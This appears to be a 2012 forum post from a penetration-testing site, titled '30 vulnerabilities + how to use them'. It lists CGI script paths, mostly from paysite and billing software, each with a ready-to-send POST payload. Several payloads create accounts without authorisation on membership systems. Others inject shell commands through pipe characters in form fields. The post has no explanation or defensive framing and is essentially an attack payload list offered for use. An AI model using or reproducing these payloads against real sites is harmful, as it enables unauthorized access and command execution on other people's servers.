China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: Cgi-bin: 30 vulnerabilities + how to use them
Author: admin
Time: 2012-9-13 16:55
==============================

/smspass.pl
username=username&password=password

/index.cgi
wei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password

/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

/ccbill-local.asp
post_values=username:password

/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
configfile=|echo; ls -alt; exit

/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
ADD+;echo;pwd;exit

/count.cgi
pinfile=|echo;pwd;exit|

/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30

==============================